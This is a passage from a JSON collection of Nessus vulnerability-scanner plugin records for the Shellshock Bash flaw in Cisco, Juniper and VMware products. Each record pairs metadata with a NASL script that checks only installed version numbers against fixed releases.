make_list(\"11.4.1HF5\",\"11.4.0HF8\",\"11.3.0HF10\",\"11.2.1HF12\",\"10.2.4HF9\");\n\n# WAM\nvmatrix[\"WAM\"] = make_array();\nvmatrix[\"WAM\"][\"affected\" ] = make_list(\"11.0.0-11.3.0\",\"10.0.0-10.2.4\");\nvmatrix[\"WAM\"][\"unaffected\"] = make_list(\"11.3.0HF10\",\"11.2.1HF12\",\"10.2.4HF9\");\n\n# WOM\nvmatrix[\"WOM\"] = make_array();\nvmatrix[\"WOM\"][\"affected\" ] = make_list(\"11.0.0-11.3.0\",\"10.0.0-10.2.4\");\nvmatrix[\"WOM\"][\"unaffected\"] = make_list(\"11.3.0HF10\",\"11.2.1HF12\",\"10.2.4HF9\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_hole(port:0, extra:bigip_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:58:14", "description": "According to its self-reported version number, the version of Cisco TelePresence Video Communication Server is affected by a command injection vulnerability known as Shellshock in its included GNU Bash shell. The vulnerability is due to the processing of trailing strings after function definitions in the values of environment variables.\nThis allows a remote attacker to execute arbitrary code via environment variable manipulation depending on the configuration of the system. The API over HTTP(S) and/or SSH can therefore be exploited.\n\nAn attacker must be authenticated before the system is exposed to this exploit.", "cvss3": {"score": null, "vector": null}, "published": "2014-10-21T00:00:00", "type": "nessus", "title": "Cisco TelePresence Video Communication Server Bash Remote Code Execution (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:cisco:telepresence_video_communication_server_software", "cpe:/a:cisco:telepresence_video_communication_server", "cpe:/h:cisco:telepresence_video_communication_server"], "id": "CISCO_TELEPRESENCE_VCS_CSCUR01461.NASL", "href": "https://www.tenable.com/plugins/nessus/78596", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78596);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_bugtraq_id(\n 70103,\n 70137,\n 70152,\n 70154,\n 70165,\n 70166\n );\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCur01461\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20140926-bash\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Cisco TelePresence Video Communication Server Bash Remote Code Execution (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Cisco TelePresence Video Communication Server installed\non the remote host is affected by a command injection vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the version of Cisco\nTelePresence Video Communication Server is affected by a command\ninjection vulnerability known as Shellshock in its included GNU Bash\nshell. The vulnerability is due to the processing of trailing strings\nafter function definitions in the values of environment variables.\nThis allows a remote attacker to execute arbitrary code via\nenvironment variable manipulation depending on the configuration of\nthe system. The API over HTTP(S) and/or SSH can therefore be\nexploited.\n\nAn attacker must be authenticated before the system is exposed to this\nexploit.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.cisco.com/bugsearch/bug/CSCur01461\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?df19d2c1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 7.2.4 / 8.1.2 / 8.2.2 / 8.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7187\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:telepresence_video_communication_server_software\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:telepresence_video_communication_server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:cisco:telepresence_video_communication_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_telepresence_video_communication_server_detect.nbin\");\n script_require_keys(\"Cisco/TelePresence_VCS/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nprod = \"Cisco TelePresence Video Communication Server\";\nversion = get_kb_item_or_exit(\"Cisco/TelePresence_VCS/Version\");\n\nif (\n version =~ \"^6\\.\" ||\n (version =~ \"^7\\.\" && ver_compare(ver:version, fix:\"7.2.4\", strict:FALSE) < 0) ||\n (version =~ \"^8\\.1\\.\" && ver_compare(ver:version, fix:\"8.1.2\", strict:FALSE) < 0) ||\n (version =~ \"^8\\.2\\.\" && ver_compare(ver:version, fix:\"8.2.2\", strict:FALSE) < 0)\n)\n{\n if (report_verbosity > 0)\n {\n report = '\\n Installed version : ' + version +\n '\\n Fixed versions : 7.2.4 / 8.1.2 / 8.2.2 / 8.5' +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, prod, version);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-05T00:01:16", "description": "The remote ASA Next-Generation Firewall (NGFW) host is missing a security patch. It is, therefore, affected by a command injection vulnerability in GNU Bash known as Shellshock. The vulnerability is due to the processing of trailing strings after function definitions in the values of environment variables. This allows a remote attacker to execute arbitrary code via environment variable manipulation depending on the configuration of the system.", "cvss3": {"score": null, "vector": null}, "published": "2014-11-03T00:00:00", "type": "nessus", "title": "Cisco ASA Next-Generation Firewall GNU Bash Environment Variable Handling Command Injection (cisco-sa-20140926-bash) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/h:cisco:adaptive_security_appliance"], "id": "CISCO-SA-CSCUR01959-ASA-CX.NASL", "href": "https://www.tenable.com/plugins/nessus/78827", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78827);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_bugtraq_id(\n 70103,\n 70137,\n 70152,\n 70154,\n 70165,\n 70166\n );\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCur01959\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20140926-bash\");\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Cisco ASA Next-Generation Firewall GNU Bash Environment Variable Handling Command Injection (cisco-sa-20140926-bash) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote security device is missing a vendor-supplied security\npatch.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote ASA Next-Generation Firewall (NGFW) host is missing a\nsecurity patch. It is, therefore, affected by a command injection\nvulnerability in GNU Bash known as Shellshock. The vulnerability is\ndue to the processing of trailing strings after function definitions\nin the values of environment variables. This allows a remote attacker\nto execute arbitrary code via environment variable manipulation\ndepending on the configuration of the system.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?df19d2c1\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the relevant patch referenced in Cisco Security Advisory\ncisco-sa-20140926-bash.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7187\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:cisco:adaptive_security_appliance\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/Cisco/ASA-CX/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"cisco_func.inc\");\n\nver = get_kb_item_or_exit('Host/Cisco/ASA-CX/Version');\nfix = '9.3.2.1(9)';\n\n# Versions 9.1.x, 9.2.x, and 9.3.x blow 9.3.2.1 (9) are vulnerable\nif (\n cisco_gen_ver_compare(a:ver, b:\"9.1.0\") >= 0 &&\n cisco_gen_ver_compare(a:ver, b:fix) < 0\n)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Installed release : ' + ver +\n '\\n Fixed release : ' + fix +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, 'ASA CX/NGFW', ver);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-05T00:01:17", "description": "According to its self-reported version, the CUCM IM and Presence Service installed on the remote host contains a version of GNU Bash that is affected by a command injection vulnerability known as Shellshock, which is due to the processing of trailing strings after function definitions in the values of environment variables. This allows a remote attacker to execute arbitrary code via environment variable manipulation depending on the configuration of the system.", "cvss3": {"score": null, "vector": null}, "published": "2014-11-11T00:00:00", "type": "nessus", "title": "CUCM IM and Presence Service GNU Bash Environment Variable Handling Command Injection (CSCur05454) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:cisco:unified_communications_manager", "cpe:/a:cisco:unified_presence_server"], "id": "CISCO_CUPS_CSCUR05454.NASL", "href": "https://www.tenable.com/plugins/nessus/79124", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79124);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_bugtraq_id(\n 70103,\n 70137,\n 70152,\n 70154,\n 70165,\n 70166\n );\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCur05454\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20140926-bash\");\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"CUCM IM and Presence Service GNU Bash Environment Variable Handling Command Injection (CSCur05454) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the CUCM IM and Presence\nService installed on the remote host contains a version of GNU Bash\nthat is affected by a command injection vulnerability known as\nShellshock, which is due to the processing of trailing strings after\nfunction definitions in the values of environment variables. This\nallows a remote attacker to execute arbitrary code via environment\nvariable manipulation depending on the configuration of the system.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.cisco.com/bugsearch/bug/CSCur05454\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Cisco Unified Presence Server 10.5(1.12900.2) or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7187\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:unified_communications_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:unified_presence_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"cisco_unified_detect.nasl\");\n script_require_ports(\"Host/UCOS/Cisco Unified Presence/version\", \"cisco_cups/system_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n# Leverage API version first\ndisplay_version = get_kb_item(\"cisco_cups/system_version\");\n# Fall back to SSH\nif (isnull(display_version))\n{\n display_version = get_kb_item_or_exit('Host/UCOS/Cisco Unified Presence/version');\n match = eregmatch(string:display_version, pattern:'^([0-9.]+(?:-[0-9]+)?)($|[^0-9])');\n if (isnull(match)) audit(AUDIT_FN_FAIL, 'eregmatch');\n version = match[1];\n}\nelse version = display_version;\n\nversion = str_replace(string:version, find:\"-\", replace:\".\");\nfix = \"10.5.1.12900.2\";\nif (ver_compare(ver:version, fix:fix, strict:FALSE) < 0)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Installed version : ' + display_version +\n '\\n Fixed version : 10.5.1.12900-2' +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, 'CUCM IM and Presence Service', display_version);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-05T00:01:44", "description": "According to its self-reported version number, the remote Junos Space version is prior to 14.1R2, and may be affected by a command injection vulnerability in GNU Bash known as Shellshock. The vulnerability is due to the processing of trailing strings after function definitions in the values of environment variables. This allows a remote attacker to execute arbitrary code via environment variable manipulation depending on the configuration of the system.", "cvss3": {"score": null, "vector": null}, "published": "2014-12-22T00:00:00", "type": "nessus", "title": "Juniper Junos Space GNU Bash Command Injection Vulnerability (JSA10648) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/a:juniper:junos_space"], "id": "JUNIPER_SPACE_JSA10648.NASL", "href": "https://www.tenable.com/plugins/nessus/80196", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(80196);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_bugtraq_id(\n 70103,\n 70137,\n 70152,\n 70154,\n 70165,\n 70166\n );\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Juniper Junos Space GNU Bash Command Injection Vulnerability (JSA10648) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the remote Junos Space\nversion is prior to 14.1R2, and may be affected by a command injection\nvulnerability in GNU Bash known as Shellshock. The vulnerability is\ndue to the processing of trailing strings after function definitions\nin the values of environment variables. This allows a remote attacker\nto execute arbitrary code via environment variable manipulation\ndepending on the configuration of the system.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10648\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n # http://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e40f2f5a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Junos Space 14.1R2 or later or apply the relevant patch\nreferenced in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7187\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/05/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/22\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:juniper:junos_space\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Junos Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/Junos_Space/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"junos.inc\");\ninclude(\"misc_func.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nver = get_kb_item_or_exit('Host/Junos_Space/version');\n\ncheck_junos_space(ver:ver, fix:'14.1R2', severity:SECURITY_HOLE);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:59:56", "description": "The version of VMware vCenter Operations Manager installed on the remote host is prior to 5.7.3 / 5.8.3. It is, therefore, affected by the environmental variable command injection vulnerability known as 'Shellshock'.", "cvss3": {"score": null, "vector": null}, "published": "2014-11-06T00:00:00", "type": "nessus", "title": "VMware vCenter Operations Management Bash Vulnerabilities (VMSA-2014-0010) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/a:vmware:vcenter_operations"], "id": "VCENTER_OPERATIONS_MANAGER_VMSA_2014-0010.NASL", "href": "https://www.tenable.com/plugins/nessus/78889", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78889);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\"\n );\n script_bugtraq_id(\n 70103,\n 70137,\n 70152,\n 70154,\n 70165,\n 70166\n );\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"VMware vCenter Operations Management Bash Vulnerabilities (VMSA-2014-0010) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has a virtualization appliance installed that is\naffected by Shellshock.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware vCenter Operations Manager installed on the\nremote host is prior to 5.7.3 / 5.8.3. It is, therefore, affected by\nthe environmental variable command injection vulnerability known as\n'Shellshock'.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://lists.vmware.com/pipermail/security-announce/2014/000272.html\");\n # http://kb.vmware.com/selfservice/microsites/search.do?language=en_US&cmd=displayKC&externalId=2091083\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d5e08f66\");\n # http://kb.vmware.com/selfservice/microsites/search.do?language=en_US&cmd=displayKC&externalId=2091002\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d4f0ad92\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2014-0010.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the vendor supplied patches.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7187\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:vcenter_operations\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"suse_11_bash-140926.nasl\");\n script_require_keys(\"Host/VMware vCenter Operations Manager/Version\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/local_checks_enabled\");\n script_require_ports(\"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\n# Check if general SuSE check already ran\nif (get_kb_item(\"Success/77958\")) exit(0, \"Plugin #77958 already found that bash needs to be updated.\");\n\napp = \"VMware vCenter Operations Manager\";\nvuln = FALSE;\n\n# local checks are required\nget_kb_item_or_exit(\"Host/local_checks_enabled\");\n\n# Check that the host is SUSE\nos = get_kb_item_or_exit(\"Host/SuSE/release\");\nif (os !~ \"^SLES\") audit(AUDIT_OS_NOT, \"SuSE\");\n\n# rpm list is required\nget_kb_item_or_exit(\"Host/SuSE/rpm-list\");\n\n# Make sure this is an affected version of vCOPs\n# According to the advisory, vCOPS 5.x is vulnerable\n# Software downloads and patches are only available\n# for 5.7 and 5.8. We're checking for those specifically\nversion = get_kb_item_or_exit(\"Host/VMware vCenter Operations Manager/Version\");\nif (version !~ \"^5\\.[78]\\.\") audit(AUDIT_INST_VER_NOT_VULN, app, version);\n\n# Perform RPM checks\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"bash-3.2-147.14.22.1\")) vuln = TRUE;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"bash-doc-3.2-147.14.22.1\")) vuln = TRUE;\nif (rpm_check(release:\"SLES11\", sp:1, 